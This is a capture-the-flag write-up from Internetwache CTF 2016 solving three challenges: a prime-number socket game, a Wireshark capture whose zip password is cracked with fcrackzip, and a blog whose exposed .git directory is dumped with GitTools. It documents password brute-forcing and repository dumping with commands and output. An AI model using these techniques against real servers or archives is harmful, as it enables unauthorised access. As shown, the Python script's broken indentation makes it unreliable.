Feb 20 2016

[+] Internetwache CTF

logo

Code-60 [It’s Prime Time!]:

we are given,,

Description: We all know that prime numbers are quite important in cryptography. Can you help me to find some?

Service: 188.166.133.53:11059

sol,,

Checking what is running on the port 11059

gameadmin@warzone:~/ctf$ nc 188.166.133.53 11059
Hi, you know that prime numbers are important, don't you? Help me calculating the next prime!
Level 1.: Find the next prime number after 5:
7
Yay, that's right!
Level 2.: Find the next prime number after 8:
43434
Nope, that's just wrong. Try again later!

Screen Shot 2016-02-20 at 10.06.45 PM

we have to write a simple script to answer to get our flag.

#! /usr/bin/env python

import socket
import re
from time import sleep

host = "188.166.133.53"
port = 11059


def get_given_num(data):
    if 'flag' not in data and 'Ooops' not in data:
        number = re.findall(r'\d+', data)[1]
        return int(number)
    else:
        print data
        exit(0)

def is_prime(num):
    for j in range(2,num):
        if (num % j) == 0:
        return False
    return True

def num_catcher(num):
    prime = num + 1
    while True:
        if is_prime(prime):
            return prime
        else:
            prime += 1

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host , port))

while True:
    try:
         data = s.recv(1024)
         print "[+] recieved data: %s" % data
         num = get_given_num(data)
         print "[+] got the given number: %s" % str(num)
         after_prime = num_catcher(num)
         print "[+] trying to send prime number %s" % str(after_prime)
         s.send(str(after_prime) + "\n")
         sleep(5)
     except:
         break

s.close()

Screen Shot 2016-02-20 at 6.52.11 PM

got the flag after solving level 100.

Flag: IW{Pr1m3s_4r3_!mp0rt4nt}

 

Misc-70 [Rock with the wired shark!]:

we are given,,

Description: Sniffing traffic is fun. I saw a wired shark. Isn’t that strange?

File: https://ctf.internetwache.org/files/misc70.zip

Sol,,

After downloading and extracting i found this file dump.pcapng, loading it on wireshark.

diaadiab@infected /Users/diaadiab/Documents/Document/ctfs/CTF-tmp/internetwache/task
> gmd5sum dump.pcapng
4ef9b06c254314466ac4ec3acabab725 dump.pcapng
diaadiab@infected /Users/diaadiab/Documents/Document/ctfs/CTF-tmp/internetwache/task
> wireshark dump.pcapng &

Screen Shot 2016-02-20 at 9.31.26 PM
Screen Shot 2016-02-20 at 9.34.48 PM
Searching in HTTP traffic, i found there is a request to a file called flag.zip by dumping file using wireshark using export packet bytes option in wireshark.
Screen Shot 2016-02-20 at 9.35.04 PM
Screen Shot 2016-02-20 at 9.46.18 PM
Now, I have flag.bin

gameadmin@warzone:~/ctf$ file flag.bin
flag.bin: Zip archive data, at least v1.0 to extract
gameadmin@warzone:~/ctf$ unzip -l flag.bin
Archive: flag.bin
 Length Date Time Name
--------- ---------- ----- ----
 28 2015-11-13 13:35 flag.txt
--------- -------
 28 1 file
gameadmin@warzone:~/ctf$ unzip flag.bin
Archive: flag.bin
[flag.bin] flag.txt password:

It’s a zip file require a password. so we are going to brute force the password using fcrackzip tool over linux and a wordList from this repo SecLists.

Screen Shot 2016-02-20 at 9.51.40 PM

gameadmin@warzone:~/ctf$ fcrackzip -D -v -u -p rockyou-75.txt flag.bin
found file 'flag.txt', (size cp/uc 40/ 28, flags b, chk 9c78)


PASSWORD FOUND!!!!: pw == azulcrema

Screen Shot 2016-02-20 at 9.55.57 PM
we got the password: azulcrema
Let’s read the flag:

 
gameadmin@warzone:~/ctf$ unzip flag.bin
Archive: flag.bin
[flag.bin] flag.txt password:
 extracting: flag.txt
gameadmin@warzone:~/ctf$ cat flag.txt
IW{HTTP_BASIC_AUTH_IS_EASY}

Screen Shot 2016-02-20 at 9.57.45 PM

Flag: IW{HTTP_BASIC_AUTH_IS_EASY}

 

Web-80 [0ldsk00lBlog]:

we are given,,

Description: I stumbled across this kinda oldskool blog. I bet it is unhackable, I mean, there’s only static HTML.

Service: https://0ldsk00lblog.ctf.internetwache.org/

Sol,,

By going to https://0ldsk00lblog.ctf.internetwache.org/ I found that it’s a normal static pages, but this statement is great enough

It's 2016 now and I need to somehow keep track of my changes to this document as it grows and grows. All people are talking about a tool called 'Git'. I think I might give this a try.

Screen Shot 2016-02-20 at 8.57.26 PMlet’s give it try https://0ldsk00lblog.ctf.internetwache.org/.git
Screen Shot 2016-02-20 at 9.04.25 PM
403 forbidden, this mean the .git directory was found there without directory traversal, so instead of downloading filesmanually, we can use GitTools from internetwache guys.

The next is not a big deal, after cloning the GitTools repo,

gameadmin@warzone:~/ctf/web80/GitTools$ ./gitdumper.sh https://0ldsk00lblog.ctf.internetwache.org/.git/ .git
Destination folder does not exist
Creating .git/.git/
Downloaded: HEAD
Downloaded: objects/info/packs
Downloaded: description
Downloaded: config
Downloaded: COMMIT_EDITMSG
Downloaded: index
Downloaded: packed-refs
Downloaded: refs/heads/master
Downloaded: refs/remotes/origin/HEAD
Downloaded: refs/stash
Downloaded: logs/HEAD
Downloaded: logs/refs/heads/master
Downloaded: logs/refs/remotes/origin/HEAD
Downloaded: info/refs
Downloaded: info/exclude
Downloaded: objects/8c/46583a968da7955c13559693b3b8c5e5d5f510
Downloaded: objects/00/00000000000000000000000000000000000000
Downloaded: objects/14/d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296
Downloaded: objects/db/a52097aba3af2b30ccbc589912ae67dcf5d77b
Downloaded: objects/26/858023dc18a164af9b9f847cbfb23919489ab2
Downloaded: objects/33/a5c0876603d7a6f9729637f36030bbabb2afa3
Downloaded: objects/19/49446afea12e0937044fdabe8cc101c87f7c54
Downloaded: objects/95/a5396e62ca5c9577f761ebe969f52d3b6a9235
Downloaded: objects/3b/e70be50c04bab8cd5d115da10c3a9c784d6bae
Downloaded: objects/25/a3f35784188ac1c9bf48a94e5a9c815bcb598c
Downloaded: objects/75/03402e4d48be951cddda34aae6e01905bb5c98
Downloaded: objects/91/f09a7948e02d891d3a39c058a634a8752aba20
Downloaded: objects/55/08adb31bf48ae5fe437bdeba60f83982356934

Screen Shot 2016-02-20 at 9.16.28 PM

gameadmin@warzone:~/ctf/web80/GitTools$ ./extractor.sh .git flag
Destination folder does not exist
Creating...
Found commit: dba52097aba3af2b30ccbc589912ae67dcf5d77b
Found file: /home/gameadmin/ctf/web80/GitTools/flag/0-dba52097aba3af2b30ccbc589912ae67dcf5d77b/index.html
Found commit: 8c46583a968da7955c13559693b3b8c5e5d5f510
Found file: /home/gameadmin/ctf/web80/GitTools/flag/1-8c46583a968da7955c13559693b3b8c5e5d5f510/index.html
Found commit: 26858023dc18a164af9b9f847cbfb23919489ab2
Found file: /home/gameadmin/ctf/web80/GitTools/flag/2-26858023dc18a164af9b9f847cbfb23919489ab2/index.html
Found commit: 14d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296
Found file: /home/gameadmin/ctf/web80/GitTools/flag/3-14d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296/index.html
fatal: Not a valid object name infopacks
Finished

Screen Shot 2016-02-20 at 9.19.59 PM

gameadmin@warzone:~/ctf/web80/GitTools$ ls flag/
total 16
drwxrwxr-x 2 gameadmin gameadmin 4096 Feb 18 06:53 0-dba52097aba3af2b30ccbc589912ae67dcf5d77b
drwxrwxr-x 2 gameadmin gameadmin 4096 Feb 18 06:53 1-8c46583a968da7955c13559693b3b8c5e5d5f510
drwxrwxr-x 2 gameadmin gameadmin 4096 Feb 18 06:53 2-26858023dc18a164af9b9f847cbfb23919489ab2
drwxrwxr-x 2 gameadmin gameadmin 4096 Feb 18 06:53 3-14d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296
gameadmin@warzone:~/ctf/web80/GitTools$ grep -rn IW{ .
./flag/2-26858023dc18a164af9b9f847cbfb23919489ab2/index.html:8: Oh, did I say that I like kittens? I like flags, too: IW{G1T_1S_4W3SOME}

Screen Shot 2016-02-20 at 9.22.08 PM
Flag: IW{G1T_1S_4W3SOME}

Leave a comment